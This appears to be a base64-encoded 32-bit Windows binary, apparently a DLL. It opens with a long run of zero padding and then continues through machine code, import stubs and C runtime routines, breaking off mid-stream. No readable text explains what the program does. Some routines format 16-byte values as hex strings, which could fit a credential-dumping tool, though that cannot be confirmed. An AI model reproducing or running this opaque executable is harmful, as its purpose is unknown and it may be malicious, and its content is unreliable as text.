AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFZo6HAAEP8V FGAAEIs1jGAAEGjccAAQUKOcfwAQ/9ajhH8AEKGcfwAQaMxwABBQ/9aLDZx/ABBovHAAEFGjiH8A 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 